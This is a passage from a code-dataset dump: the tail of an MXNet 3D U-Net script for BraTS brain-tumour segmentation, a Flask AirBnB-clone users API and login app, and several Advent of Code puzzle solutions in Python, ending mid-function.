if zmin > max_sizes[2]: zmin = max_sizes[2]
img = img[:, xmin : xmin + crop_size[0],
ymin : ymin + crop_size[1],
zmin : zmin + crop_size[2]]
mask = mask[:, xmin : xmin + crop_size[0],
ymin : ymin + crop_size[1],
zmin : zmin + crop_size[2]]
return img, mask
def img_warp(img, mask, theta_max=15, offset_max=0, scale_max=1.1, shear_max=0.1):
"""Training data augmentation with random affine transformation"""
# Rotation
vec = np.random.normal(0, 1, 3)
vec /= np.sqrt(np.sum(vec ** 2))
theta = np.random.uniform(- theta_max, theta_max, 1) * pi / 180
R = euler.axangle2mat(vec, theta)
# Scale/zoom
sign = -1 if np.random.random() < 0.5 else 1
Z = np.ones(3) * np.random.uniform(1, scale_max, 1) ** sign
# Translation
c_in = np.array(img.shape[1:]) // 2
offset = np.random.uniform(- offset_max, offset_max, 3)
T = - (c_in).dot((R * Z).T) + c_in + offset
# Shear
S = np.random.uniform(- shear_max, shear_max, 3)
# Compose affine
mat = affines.compose(T, R, Z, S)
# Apply warp
img_warped = np.zeros_like(img)
mask_warped = np.zeros_like(mask)
for i in range(len(img)):
img_warped[i,] = affine_transform(img[i,], mat, order=1) # Trilinear
mask_warped[0,] = affine_transform(mask[0,], mat, order=0) # Nearest neighbor
return img_warped, mask_warped
def brats_transform(img, means, stds):
"""Routine image-specific processing (e.g. normalization)"""
means = means.reshape(-1,1,1,1)
stds = stds.reshape(-1,1,1,1)
return (img - means) / stds
################################################################################
# U-Net
def conv_block(channels, num_convs=2, use_bias=False, use_global_stats=False, **kwargs):
"""Define U-Net convolution block"""
out = HybridSequential(prefix="")
with out.name_scope():
for _ in range(num_convs):
out.add(Conv3D(channels=channels, kernel_size=3, padding=1, use_bias=use_bias))
out.add(Activation('relu'))
out.add(BatchNorm(use_global_stats=use_global_stats)) #BN after relu seems to be the more recommended option.
return out
class UnetSkipUnit(HybridBlock):
"""Define U-Net skip block"""
def __init__(self, inner_channels, outer_channels, inner_block=None, innermost=False, outermost=False, use_dropout=False, use_bias=False, **kwargs):
super(UnetSkipUnit, self).__init__()
with self.name_scope():
self.outermost = outermost
downsample = MaxPool3D(pool_size=2, strides=2)
upsample = Conv3DTranspose(channels=outer_channels, kernel_size=2, padding=0, strides=2, use_bias=use_bias)
head = Conv3D(channels=outer_channels, kernel_size=1)
self.model = HybridSequential()
if not outermost:
self.model.add(downsample)
self.model.add(conv_block(inner_channels, use_bias=use_bias, **kwargs))
if not innermost:
self.model.add(inner_block)
self.model.add(conv_block(inner_channels, use_bias=use_bias, **kwargs))
if not outermost:
self.model.add(upsample)
if outermost:
if use_dropout:
self.model.add(Dropout(rate=0.1))
self.model.add(head)
def hybrid_forward(self, F, x):
if self.outermost:
return self.model(x)
else:
return F.concat(self.model(x), x, dim=1)
class UnetGenerator(HybridBlock):
"""Define recursive U-Net generator"""
def __init__(self, num_downs=4, classes=2, ngf=64, **kwargs):
super(UnetGenerator, self).__init__()
#Recursively build Unet from the inside out
unet = UnetSkipUnit(ngf * 2 ** num_downs, ngf * 2 ** (num_downs-1), innermost=True, **kwargs)
for depth in range(num_downs-1, 0, -1):
unet = UnetSkipUnit(ngf * 2 ** depth, ngf * 2 ** (depth-1), unet, **kwargs)
unet = UnetSkipUnit(ngf, classes, unet, outermost=True, **kwargs)
with self.name_scope():
self.model = unet
def hybrid_forward(self, F, x):
return self.model(x)
################################################################################
# Inference
# ET = enhancing tumor (blue) = label 4
# TC = tumor core = ET + non-enhancing tumor/necrosis (red) = label 4 + 1
# WT = whole tumor = TC + edema (green) = label 4 + 1 + 2
def brats_validate(model, data_loader, crop_size, overlap, ctx):
"""Predict segs from val data, compare to ground truth val segs, and calculate val dice metrics"""
# Setup metric dictionary
metrics = init_brats_metrics()
# Get patch index iterator
dims = data_loader._dataset[0][1].shape[1:]
patch_iter = get_patch_iter(dims, crop_size, overlap)
# Iterate over validation subjects
for i, (data, label) in enumerate(data_loader):
# Iterate over patches
for inds in patch_iter:
# Extract patch
data_patch = get_patch(data, inds).as_in_context(ctx)
label_patch = get_patch(label, inds)
label_mask = label_patch.squeeze().asnumpy()
# Run patch through net
output_mask = get_output_mask(model, data_patch).asnumpy()
# Update metrics
for _, metric in metrics.items():
label_mask_bin = np.isin(label_mask, metric['labels'])
output_mask_bin = np.isin(output_mask, metric['labels'])
metric['tp'] += np.sum(label_mask_bin * output_mask_bin)
metric['tot'] += np.sum(label_mask_bin) + np.sum(output_mask_bin)
# Calculate overall metrics
for _, metric in metrics.items():
metric['DSC'] = 2 * metric['tp'] / metric['tot']
return metrics
def brats_predict(model, data, crop_size, overlap, n_classes, ctx):
"""Apply model to predict seg of unknown/test data"""
# Get patch index iterator
dims = data.squeeze().shape[1:]
patch_iter = get_patch_iter(dims, crop_size, overlap)
# Initialize output vol
if overlap != 0:
mask = - nd.ones(dims + (len(patch_iter), ), ctx=mx.cpu())
else:
mask = nd.zeros(dims, ctx=mx.cpu())
# Iterate over patches
for i, inds in enumerate(patch_iter):
data_patch = get_patch(data, inds).as_in_context(ctx)
output_mask = get_output_mask(model, data_patch)
mask = put_patch(mask, output_mask.as_in_context(mx.cpu()), inds, i)
mask = mask.asnumpy()
# If overlapping patches, get class prediction by majority vote (i.e. mode)
if mask.shape != dims:
mask = mode(mask, n_classes=n_classes)
mask = mask.squeeze()
return mask
def get_patch_iter(dims, crop_size, overlap):
"""Wrapper to get patch iterator"""
x_patches = get_patch_inds(dims[0], crop_size[0], overlap)
y_patches = get_patch_inds(dims[1], crop_size[1], overlap)
z_patches = get_patch_inds(dims[2], crop_size[2], overlap)
patch_iter = list(itertools.product(x_patches, y_patches, z_patches))
return patch_iter
def get_patch_inds(axis_dim, crop_size, overlap):
"""Get list of indices needed to tile patches across entire input vol"""
if crop_size > axis_dim:
i_start = [0]
i_end = [axis_dim]
else:
n_overlap = int(np.floor(crop_size * overlap))
i_start = np.arange(0, axis_dim - n_overlap, crop_size - n_overlap)
i_end = i_start + crop_size
# Scoot the last patch back so it's not hanging off the edge
if i_end[-1] > axis_dim:
i_start[-1] = axis_dim - crop_size
i_end[-1] = axis_dim
return [[x, y] for x, y in zip(i_start, i_end)]
def get_patch(data, inds):
"""Extract patch data ndarray from a larger image vol"""
x_inds = inds[0]
y_inds = inds[1]
z_inds = inds[2]
data_patch = data[:, :, x_inds[0] : x_inds[1],
y_inds[0] : y_inds[1],
z_inds[0] : z_inds[1]]
return data_patch
def put_patch(data, data_patch, inds, i):
"""Place patch data ndarray back into a larger image vol"""
x_inds = inds[0]
y_inds = inds[1]
z_inds = inds[2]
if np.ndim(data_patch) == np.ndim(data):
data[x_inds[0] : x_inds[1],
y_inds[0] : y_inds[1],
z_inds[0] : z_inds[1]] = data_patch
else:
data[x_inds[0] : x_inds[1],
y_inds[0] : y_inds[1],
z_inds[0] : z_inds[1], i] = data_patch
return data
def get_output_mask(model, data):
"""Wrapper for model prediction"""
output = model(data)
output_mask = output.argmax_channel().squeeze()
return output_mask
################################################################################
# Misc helper functions
def init_brats_metrics():
"""Initialize dict for BraTS Dice metrics"""
metrics = {}
metrics['ET'] = {'labels': [3]}
metrics['TC'] = {'labels': [1, 3]}
metrics['WT'] = {'labels': [1, 2, 3]}
for _, value in metrics.items():
value.update({'tp':0, 'tot':0})
return metrics
def calc_brats_metrics(label_mask, output_mask):
"""Calculate BraTS Dice metrics (ET, TC, WT)"""
metrics = init_brats_metrics()
for _, metric in metrics.items():
label_mask_bin = np.isin(label_mask, metric['labels'])
output_mask_bin = np.isin(output_mask, metric['labels'])
metric['tp'] = np.sum(label_mask_bin * output_mask_bin)
metric['tot'] = np.sum(label_mask_bin) + np.sum(output_mask_bin)
metric['DSC'] = 2 * metric['tp'] / metric['tot']
return metrics
def dsc(truth, pred):
"""Dice Sorenson (similarity) Coefficient
(For the simple binary or overall-multiclass case)
"""
tp = truth == pred
tp = tp * (truth != 0)
return 2 * np.sum(tp) / (np.sum(truth != 0) + np.sum(pred != 0))
def get_k_folds(n, k, seed=None):
"""Simple cross-validation index generator"""
np.random.seed(seed)
x = np.arange(n)
np.random.shuffle(x)
np.random.seed()
return [x[i::k] for i in range(k)]
def mode(x, n_classes):
"""Calculate the mode (i.e. ensemble vote) over a set of overlapping prediction patches"""
dims = x.shape[:-1] + (n_classes, )
counts = np.zeros(dims)
for i in range(n_classes):
counts[..., i] = (x==i).sum(axis=x.ndim-1)
labels = counts.argmax(axis=x.ndim-1)
return labels
def get_crosshairs(mask):
"""Determine center of mass of whole tumor for crosshairs plotting"""
mask_bin = mask != 0
xmax = mask_bin.sum((1,2)).argmax() + 1 # +1 for R indexing
ymax = mask_bin.sum((0,2)).argmax() + 1
zmax = mask_bin.sum((0,1)).argmax() + 1
xyz = np.array([xmax, ymax, zmax])
return xyz
def save_params(net, best_metric, current_metric, epoch, save_interval, prefix):
"""Logic for if/when to save/checkpoint model parameters"""
if current_metric > best_metric:
best_metric = current_metric
net.save_parameters('{:s}_best.params'.format(prefix, epoch, current_metric))
with open(prefix+'_best.log', 'a') as f:
f.write('\n{:04d}:\t{:.4f}'.format(epoch, current_metric))
if save_interval and (epoch + 1) % save_interval == 0:
net.save_parameters('{:s}_{:04d}_{:.4f}.params'.format(prefix, epoch, current_metric))
return best_metric
def start_logger(args):
"""Start logging utilities for stdout, log files, and mxboard"""
logging.basicConfig()
logger = logging.getLogger()
logger.setLevel(logging.INFO)
log_file_path = args.save_prefix + '_train.log'
log_dir = os.path.dirname(log_file_path)
if log_dir and not os.path.exists(log_dir):
os.makedirs(log_dir)
fh = logging.FileHandler(log_file_path)
logger.addHandler(fh)
logger.info(args)
logger.info('Start training from [Epoch {}]'.format(args.start_epoch))
# Setup mxboard logging
tb_dir = args.save_prefix + '_tb'
if not os.path.exists(tb_dir):
os.makedirs(tb_dir)
sw = SummaryWriter(logdir=tb_dir, flush_secs=60, verbose=False)
return logger, sw
def log_epoch_hooks(epoch, train_loss, metrics, logger, sw):
"""Epoch logging"""
DSCs = np.array([v['DSC'] for k,v in metrics.items()])
DSC_avg = DSCs.mean()
logger.info('E %d | loss %.4f | ET %.4f | TC %.4f | WT %.4f | Avg %.4f'%((epoch, train_loss) + tuple(DSCs) + (DSC_avg, )))
sw.add_scalar(tag='Dice', value=('Val ET', DSCs[0]), global_step=epoch)
sw.add_scalar(tag='Dice', value=('Val TC', DSCs[1]), global_step=epoch)
sw.add_scalar(tag='Dice', value=('Val WT', DSCs[2]), global_step=epoch)
sw.add_scalar(tag='Dice', value=('Val Avg', DSCs.mean()), global_step=epoch)
return DSC_avg
class SoftDiceLoss(gluon.loss.Loss):
"""Soft Dice loss for segmentation"""
def __init__(self, axis=-1, smooth=0, eps=1e-6, weight=None, batch_axis=0, **kwargs):
super(SoftDiceLoss, self).__init__(weight, batch_axis, **kwargs)
self._axis = axis
self._smooth = smooth
self._eps = eps
def hybrid_forward(self, F, pred, label, sample_weight=None):
# import pdb; pdb.set_trace()
pred = F.softmax(pred, self._axis)
label = F.one_hot(label, 4).transpose((0,4,1,2,3))
tp = pred * label
tp = F.sum(tp, axis=(self._axis, self._batch_axis), exclude=True, keepdims=True)
tot = pred + label
tot = F.sum(tot, axis=(self._axis, self._batch_axis), exclude=True, keepdims=True)
dsc = (2 * tp + self._smooth) / (tot + self._smooth + self._eps)
return - F.sum(dsc, axis=self._batch_axis, exclude=True)
``` |
{
"source": "johncoleman83/AirBnB",
"score": 3
} |
#### File: v1/views/users.py
```python
from api.v1.views import app_views
from flask import abort, jsonify, request
from models import storage, CNC, User
from flasgger.utils import swag_from
@app_views.route('/users/', methods=['GET', 'POST'])
@swag_from('swagger_yaml/users_no_id.yml', methods=['GET', 'POST'])
def users_no_id(user_id=None):
"""
users route that handles http requests with no ID given
"""
auth_header = request.headers.get('Authorization')
if auth_header:
try:
auth_token = auth_header.split(" ")[1]
except IndexError:
abort(400, 'Bearer token malformed.')
else:
abort(400, 'Provide a valid auth token.')
resp = User.decode_auth_token(auth_token)
if 'Please log in again.' in resp:
abort(400, resp)
if request.method == 'GET':
all_users = storage.all('User')
all_users = [obj.to_json() for obj in all_users.values()]
return jsonify(all_users)
if request.method == 'POST':
req_data = request.get_json()
if req_data is None:
abort(400, 'Not a JSON')
if req_data.get('email') is None:
abort(400, 'Missing email')
if req_data.get('password') is None:
abort(400, 'Missing password')
User = CNC.get('User')
new_object = User(**req_data)
new_object.save()
return jsonify(new_object.to_json()), 201
@app_views.route('/users/<user_id>', methods=['GET', 'DELETE', 'PUT'])
@swag_from('swagger_yaml/users_id.yml', methods=['GET', 'DELETE', 'PUT'])
def user_with_id(user_id=None):
"""
users route that handles http requests with ID given
"""
auth_header = request.headers.get('Authorization')
if auth_header:
try:
auth_token = auth_header.split(" ")[1]
except IndexError:
abort(400, 'Bearer token malformed.')
else:
abort(400, 'Provide a valid auth token.')
resp = User.decode_auth_token(auth_token)
if 'Please log in again.' in resp:
abort(400, resp)
user_obj = storage.get('User', user_id)
if user_obj is None:
abort(404, 'Not found')
if request.method == 'GET':
return jsonify(user_obj.to_json())
if request.method == 'DELETE':
user_obj.delete()
del user_obj
return jsonify({}), 200
if request.method == 'PUT':
req_data = request.get_json()
if req_data is None:
abort(400, 'Not a JSON')
user_obj.bm_update(req_data)
return jsonify(user_obj.to_json()), 200
```
#### File: AirBnB/main_app/app.py
```python
from flask import Flask, render_template, request, url_for
import json
from models import storage
import requests
from uuid import uuid4
# flask setup
app = Flask(__name__)
app.url_map.strict_slashes = False
port = 8000
host = '0.0.0.0'
# begin flask page rendering
@app.teardown_appcontext
def teardown_db(exception):
"""
after each request, this method calls .close() (i.e. .remove()) on
the current SQLAlchemy Session
"""
storage.close()
@app.route('/', methods=['GET', 'POST'])
def main_index():
"""
handles request to main index, currently a login page
"""
cache_id = uuid4()
if request.method == 'GET':
return render_template('index.html', cache_id=cache_id, message=None)
if request.method == 'POST':
email = request.form.get('email', None)
password = request.form.get('password', None)
payload = {
'email': email,
'password': password
}
headers = {
'content-type': 'application/json'
}
action = request.form.get('action')
if action == 'login':
url = 'http://0.0.0.0:5001/auth/login'
elif action == 'signup':
url = 'http://0.0.0.0:5001/auth/register'
else:
auth_token = request.form.get('logout')
return logout(auth_token=auth_token)
r = requests.post(url, headers=headers,
data=json.dumps(payload))
r_data = r.json()
if r_data.get('error'):
return render_template('index.html',
cache_id=cache_id,
message=r_data.get('error'))
auth_token = r_data.get('auth_token')
if auth_token is None:
return render_template('index.html',
cache_id=cache_id,
message=r_data.get('error'))
if 'register' in url:
signup_message = 'thank you for signing up'
return render_template('index.html',
cache_id=cache_id,
message=signup_message)
state_objs = storage.all('State').values()
states = dict([state.name, state] for state in state_objs)
amens = list(storage.all('Amenity').values())
cache_id = uuid4()
return render_template('places.html', cache_id=cache_id, states=states,
amens=amens, auth_token=auth_token)
@app.route('/logout', methods=['GET', 'POST'])
def logout(auth_token=None):
"""
handles request to main index, currently a login page
"""
if request.method == 'GET':
cache_id =uuid4()
return render_template('404.html', cache_id=cache_id), 404
cache_id = uuid4()
if auth_token is None:
auth_token = request.form.get('logout')
headers = {
'content-type': 'application/json',
'Authorization': 'Bearer {}'.format(auth_token)
}
url = 'http://0.0.0.0:5001/auth/logout'
r = requests.post(url, headers=headers)
r_data = r.json()
if r_data.get('error'):
return render_template('index.html',
cache_id=cach_id,
message=r_data.get('error'))
message = 'You are now logged out.'
cache_id = uuid4()
return render_template('index.html',
cache_id=cache_id,
message=message)
@app.errorhandler(404)
def page_not_found(error):
"""
404 Error Handler
"""
cache_id = uuid4()
return render_template('404.html', cache_id=cache_id), 404
if __name__ == "__main__":
"""
MAIN Flask App
"""
app.run(host=host, port=port)
``` |
{
"source": "johncoleman83/aoc-solutions",
"score": 4
} |
#### File: python/src/day1.py
```python
import os
from shared.readdayinput import readdayinput
def first_half(dayinput):
"""
first half solver:
An opening parenthesis, (, means he should go up one floor
and a closing parenthesis, ), means he should go down one floor.
"""
result = dayinput.count('(') - dayinput.count(')')
return result
def second_half(dayinput):
"""
second half solver:
"""
i = 0
floor = 0
while i < len(dayinput):
if dayinput[i] == '(':
floor += 1
elif dayinput[i] == ')':
floor -=1
if floor == -1:
return i + 1
i += 1
return -1
def app():
"""
runs day application
"""
dayinput = readdayinput()
half_one = first_half(dayinput)
half_two = second_half(dayinput)
print(half_one, half_two)
if __name__ == "__main__":
"""
MAIN APP
"""
app()
```
#### File: python/src/day2.py
```python
import os
from shared.readdayinput import readdayinput
def first_half(dayinput):
"""
first half solver:
length l, width w, and height h
find the surface area of the box, which is 2*l*w + 2*w*h + 2*h*l plus area of smallest side
"""
lines = dayinput.split('\n')
total_sq_feet = 0
for line in lines:
dimensions = map(lambda x: int(x), line.split('x'))
[l, w, h] = sorted(dimensions)
sq_feet = (2 * l * w) + (2 * w * h) + (2 * h * l) + (l * w)
total_sq_feet += sq_feet
return total_sq_feet
def second_half(dayinput):
"""
second half solver:
ribbon required to wrap a present is the shortest distance around its sides
the perfect bow is equal to the cubic feet of volume of the present
"""
lines = dayinput.split('\n')
total_ribbon_feet = 0
for line in lines:
dimensions = map(lambda x: int(x), line.split('x'))
[l, w, h] = sorted(dimensions)
side_ribbon = 2 * (l + w)
bow = l * w * h
total_ribbon_feet += (side_ribbon + bow)
return total_ribbon_feet
def app():
"""
runs day application
"""
dayinput = readdayinput()
half_one = first_half(dayinput)
half_two = second_half(dayinput)
print(half_one, half_two)
if __name__ == "__main__":
"""
MAIN APP
"""
app()
```
#### File: python/src/day6.py
```python
import os
from shared.readdayinput import readdayinput
class GridLights(object):
def __init__(self, v2 = False):
self.v2 = v2
self.grid = self.make_grid()
self.TASK_TO_FUNC = {
'on': self.turn_on,
'off': self.turn_off,
'toggle': self.toggle,
'on_v2': self.turn_on_v2,
'off_v2': self.turn_off_v2,
'toggle_v2': self.toggle_v2
}
def make_grid(self):
grid = {}
for y in range(1000):
for x in range(1000):
grid[(x, y)] = 0
return grid
def turn_on(self, coords):
self.grid[coords] = 1
def turn_off(self, coords):
self.grid[coords] = 0
def toggle(self, coords):
state = self.grid.get(coords, 0)
self.grid[coords] = 0 if state == 1 else 1
def turn_on_v2(self, coords):
self.grid[coords] += 1
def turn_off_v2(self, coords):
if self.grid[coords] > 0:
self.grid[coords] -= 1
def toggle_v2(self, coords):
self.grid[coords] += 2
def loop_and_do_task(self, corner_one, corner_two, f):
for y in range(corner_one[1], corner_two[1] + 1):
for x in range(corner_one[0], corner_two[0] + 1):
f((x, y))
def do_task(self, corner_one, corner_two, task):
f = self.TASK_TO_FUNC[task]
#print(corner_one, corner_two, task, f)
self.loop_and_do_task(corner_one, corner_two, f)
def string_to_coords(self, s):
coords = s.split(',')
x, y = int(coords[0]), int(coords[1])
return (x, y)
def parse_instructions_and_do(self, instruction):
instruction_list = instruction.split(' ')
corner_one = self.string_to_coords(instruction_list[-3])
corner_two = self.string_to_coords(instruction_list[-1])
task = instruction_list[0]
if task == 'turn':
task = instruction_list[1]
if self.v2 == True:
task += '_v2'
#print(task, instruction_list)
self.do_task(corner_one, corner_two, task)
def on_lights_count(self):
return sum(self.grid.values())
def off_lights_count(self):
return self.grid.values().count(0)
def first_half(dayinput):
"""
first half solver:
After following the instructions, how many lights are lit?
"""
instructions = dayinput.split('\n')
lights = GridLights()
for instruction in instructions:
lights.parse_instructions_and_do(instruction)
return lights.on_lights_count()
def second_half(dayinput):
"""
second half solver:
What is the total brightness of all lights combined after following Santa's instructions?
"""
instructions = dayinput.split('\n')
lights = GridLights(True)
for instruction in instructions:
lights.parse_instructions_and_do(instruction)
return lights.on_lights_count()
def app():
"""
runs day application
"""
dayinput = readdayinput()
half_one = first_half(dayinput)
print(half_one)
half_two = second_half(dayinput)
print(half_two)
if __name__ == "__main__":
"""
MAIN APP
"""
app()
```
#### File: python/src/day4.py
```python
import os
import string
from shared.readdayinput import readdayinput
testinstructions = """aaaaa-bbb-z-y-x-123[abxyz]
a-b-c-d-e-f-g-h-987[abcde]
not-a-real-room-404[oarel]
totally-real-room-200[decoy]"""
# sum of test instructions: `1514`
def sort_by_frequencies(alphas):
"""
returns new string sorted by frequencies of alphas
"""
items = []
temp = alphas[0]
for x in range(1, len(alphas)):
if alphas[x] == alphas[x - 1]:
temp += alphas[x]
else:
items.append(temp)
temp = alphas[x]
items.append(temp)
newa = ''.join([k[0] for k in sorted(items, key=lambda x: -len(x))[:5]])
return newa
def ceasarcipher(sentence, shift):
"""
uses ceasar cipher to decrypt sentence
"""
alphabet = string.ascii_lowercase * 2
newsentence = []
for word in sentence:
newword = []
for let in word:
index = ord(let) - 97
newindex = index + shift
newword.append(alphabet[newindex])
newsentence.append(''.join(newword))
return ' '.join(newsentence)
def encryptrooms(dayinput):
"""
first half solver:
encrypt real rooms and add the sum of rooms
"""
realrooms = []
cases = dayinput.split('\n')
for encrypted in cases:
e = encrypted.split('[')
checksum = e[1][:-1]
sector = int(e[0].split('-')[-1])
alphas = ''.join(sorted(''.join(e[0].split('-')[:-1])))
sortedalphas = sort_by_frequencies(alphas)
if sortedalphas == checksum:
sentence = e[0].split('-')[:-1]
decryptedsentence = ceasarcipher(sentence, sector % 26)
if 'northpole object storage' in decryptedsentence:
print(encrypted)
print(decryptedsentence, sector)
realrooms.append(sector)
print(sum(realrooms))
def app():
"""
runs day application
"""
dayinput = readdayinput()
encryptrooms(dayinput)
if __name__ == "__main__":
"""
MAIN APP
"""
app()
```
#### File: python/src/day7.py
```python
import os
from shared.readdayinput import readdayinput
testcase = """abba[mnop]qrst
abcd[bddb]xyyx
aaaa[qwer]tyui
ioxxoj[asdfgh]zxcvbn"""
def isvalid_tls(sub, brackets):
"""
checks if substring is valid TLS IP7
"""
ip7 = False
if '[' in sub or ']' in sub:
return "unknown"
if sub[:2] == ''.join(list(reversed(sub[2:]))):
if sub.count(sub[0]) == 4:
ip7 = False
else:
ip7 = True
if ip7 is False:
return "unknown"
if brackets is True and ip7 is True:
return "invalid"
if brackets is False and ip7 is True:
return "valid"
def count_tls_ips(dayinput):
"""
first half solver:
"""
total = 0
lines = dayinput.split('\n')
for ip in lines:
brackets = False
isvalid_ip = False
start = 0
end = 4
while end <= len(ip):
sub = ip[start:end]
if '[' in sub:
brackets = True
if ']' in sub:
brackets = False
validity = isvalid_tls(sub, brackets)
if validity == "invalid":
isvalid_ip = False
break
if validity == "valid":
isvalid_ip = True
start += 1
end += 1
if isvalid_ip is True:
#print("valid: {}".format(ip))
total += 1
else:
pass
#print("invalid: {}".format(ip))
return total
def isvalid_ssl(sub, brackets):
"""
checks if substring is valid SSL IP7
"""
valid = False
if '[' in sub or ']' in sub:
return "invalid"
if sub[0] == sub[2] and sub[1] != sub[0]:
if brackets == False:
return "validaba"
else:
return "validbab"
return "invalid"
def check_ssl(aba, bab):
"""
checks if any matches of valid aba & bab are found
"""
for a in aba:
for b in bab:
if a[0] == b[1] and b[0] == a[1]:
return True
return False
def count_ssl_ips(dayinput):
"""
second half solver:
"""
total = 0
lines = dayinput.split('\n')
for ip in lines:
brackets = False
start = 0
end = 3
aba = []
bab = []
while end <= len(ip):
sub = ip[start:end]
if '[' in sub:
brackets = True
if ']' in sub:
brackets = False
validity = isvalid_ssl(sub, brackets)
if validity == "validaba":
aba.append(sub)
if validity == "validbab":
bab.append(sub)
start += 1
end += 1
isvalid_ip = check_ssl(aba, bab)
if isvalid_ip is True:
#print("valid: {} - {}:{}".format(ip, aba, bab))
total += 1
else:
pass
#print("invalid: {}".format(ip))
return total
def app():
"""
runs day application
"""
dayinput = readdayinput()
tls_ips = count_tls_ips(dayinput)
ssl_ips = count_ssl_ips(dayinput)
print(tls_ips)
print(ssl_ips)
if __name__ == "__main__":
"""
MAIN APP
"""
app()
```
#### File: python/src/template.py
```python
import os
def readdayinput():
"""
Reads day input to solve
"""
thisfile = os.path.basename(__file__)
thisfile = thisfile[:len(thisfile) - 3]
print("{}\n{}".format("-" * len(thisfile), thisfile))
if __name__ == "__main__":
resource = "../resources"
else:
resource = "./resources"
dayinputfile = "{}/{}input.txt".format(resource, thisfile)
with open(dayinputfile, mode='r', encoding='utf-8') as fileio:
dayinput = fileio.read()
dayinput = dayinput.strip('\n')
return dayinput
def first_half(dayinput):
"""
first half solver:
"""
lines = dayinput.split('\n')
def app():
"""
runs day application
"""
dayinput = readdayinput()
result = first_half(dayinput)
print(result)
if __name__ == "__main__":
"""
MAIN APP
"""
app()
```
#### File: python/src/day13.py
```python
import os
from shared.readdayinput import readdayinput
TEST = """0: 3
1: 2
4: 4
6: 4"""
def reset_firewall(firewall):
for key in firewall.keys():
if firewall[key] is None:
continue
index = firewall[key].index(1)
firewall[key][index] = 0
firewall[key][1] = 1
def copy_firewall(firewall):
copy = {}
for key, val in firewall.items():
if val is None:
copy[key] = val
else:
copy[key] = [x for x in val]
return copy
def shift_firewall(firewall):
for key in firewall.keys():
if firewall[key] is None:
continue
if len(firewall[key]) <= 2:
continue
direction = firewall[key][0]
index = firewall[key].index(1)
firewall[key][index] = 0
if direction == 'F':
index += 1
else:
index -= 1
if index == len(firewall[key]):
index = len(firewall[key]) - 2
firewall[key][0] = 'B'
elif index == 0:
index = 2
firewall[key][0] = 'F'
firewall[key][index] = 1
def run_firewall_is_success(max_layer, firewall):
i = 0
while i < max_layer + 1:
if firewall[i] is None:
pass
elif firewall[i][1] == 1:
return False
shift_firewall(firewall)
i += 1
return True
def run_firewall(max_layer, firewall):
i = 0
total_severity = 0
while i < max_layer + 1:
if firewall[i] is None:
pass
elif firewall[i][1] == 1:
total_severity += i * (len(firewall[i]) - 1)
shift_firewall(firewall)
i += 1
return total_severity
def first_half(dayinput):
"""
first half solver:
"""
lines = dayinput.split('\n')
firewall = {}
for line in lines:
layer, depth = line.split(': ')
firewall[int(layer)] = [0 for x in range(int(depth) + 1)]
firewall[int(layer)][0] = 'F'
firewall[int(layer)][1] = 1
last_layer = max(list(firewall.keys()))
for i in range(last_layer):
if i not in firewall:
firewall[i] = None
result = run_firewall(last_layer, firewall)
return result
def second_half(dayinput):
"""
second half solver:
"""
lines = dayinput.split('\n')
firewall = {}
for line in lines:
layer, depth = line.split(': ')
firewall[int(layer)] = [0 for x in range(int(depth) + 1)]
firewall[int(layer)][0] = 'F'
firewall[int(layer)][1] = 1
last_layer = max(list(firewall.keys()))
for i in range(last_layer):
if i not in firewall:
firewall[i] = None
test = 0
while True:
copy_fire = copy_firewall(firewall)
result = run_firewall_is_success(last_layer, copy_fire)
if result is True:
return test
shift_firewall(firewall)
test += 1
def app():
"""
runs day application
"""
dayinput = readdayinput()
half_one = first_half(dayinput)
half_two = second_half(dayinput)
#half_two = second_half(TEST)
print(half_one, half_two)
if __name__ == "__main__":
"""
MAIN APP
"""
app()
```
#### File: python/src/day17.py
```python
import os
from shared.readdayinput import readdayinput
def first_half(dayinput):
"""
first half solver:
"""
# 344
circlebuffer = [0]
current_pos = 0
steps = 344
index = 0
count = 1
size = 1
all_zeros = []
while count < 50000001:
index += steps + 1
index = index % size
# ciclebuffer.insert(index, count)
if index == 0:
all_zeros.append(count)
size += 1
count += 1
return all_zeros[-1]
def second_half(dayinput):
"""
second half solver:
"""
lines = dayinput.split('\n')
result = None
return result
def app():
"""
runs day application
"""
dayinput = readdayinput()
half_one = first_half(dayinput)
half_two = second_half(dayinput)
print(half_one, half_two)
if __name__ == "__main__":
"""
MAIN APP
"""
app()
```
#### File: python/src/day1.py
```python
import os
from shared.readdayinput import readdayinput
testcase = "11221"
def first_half(dayinput):
"""
first half solver:
"""
half = len(dayinput) // 2
end = len(dayinput)
dayinput = dayinput * 2
i = 0
total = 0
while i < end:
next_i = i + half
if dayinput[i] == dayinput[next_i]:
total += int(dayinput[i])
i += 1
return total
def app():
"""
runs day application
"""
dayinput = readdayinput()
result = first_half(dayinput)
print(result)
if __name__ == "__main__":
"""
MAIN APP
"""
app()
```
#### File: python/src/day9.py
```python
import os
from shared.readdayinput import readdayinput
def first_half(stream):
"""
first half solver:
"""
stream = [x for x in stream]
i = 0
garbage = 0
while i < len(stream):
if stream[i] == '!':
del stream[i]
del stream[i]
continue
if stream[i] == '<':
start = i
temp = i
while temp < len(stream):
if stream[temp] == '!':
del stream[temp]
del stream[temp]
continue
if stream[temp] == '>':
end = temp
break
temp += 1
garbage += (end - start - 1)
stream = stream[:start] + stream[end + 1:]
i += 1
stream = ''.join(stream)
stream = stream.replace(',', '')
#print(stream)
stream = [x for x in stream]
q = []
i = 0
count = 0
while i < len(stream):
if stream[i] == '{':
q.append('{')
if stream[i] == '}':
count += len(q)
q.pop()
i += 1
return [count, garbage]
def second_half(dayinput):
"""
second half solver:
"""
lines = dayinput.split('\n')
result = None
return result
def app():
"""
runs day application
"""
dayinput = readdayinput()
half_one = first_half(dayinput)
half_two = second_half(dayinput)
print(half_one, half_two)
if __name__ == "__main__":
"""
MAIN APP
"""
app()
```
#### File: python/src/day2.py
```python
import os
import difflib
from shared.readdayinput import readdayinput
def first_half(dayinput):
"""
first half solver:
To make sure you didn't miss any, you scan the likely
candidate boxes again, counting the number that have an
ID containing exactly two of any letter and then separately
counting those with exactly three of any letter. You can
multiply those two counts together to get a rudimentary
checksum and compare it to what your device predicts.
"""
lines = dayinput.split('\n')
result = None
twos = 0
threes = 0
for line in lines:
l_list = [l for l in line]
found_twos = False
found_threes = False
for l in line:
if l_list.count(l) == 2 and not found_twos:
twos += 1
found_twos = True
if l_list.count(l) == 3 and not found_threes:
threes += 1
found_threes = True
return twos * threes
def second_half(dayinput):
"""
second half solver:
What letters are common between the two correct box IDs?
(In the example above, this is found by removing the differing
character from either ID, producing fgij.)
"""
lines = dayinput.split('\n')
result = None
for i in range(len(lines)):
for j in range(i + 1, len(lines)):
line_1 = lines[i]
line_2 = lines[j]
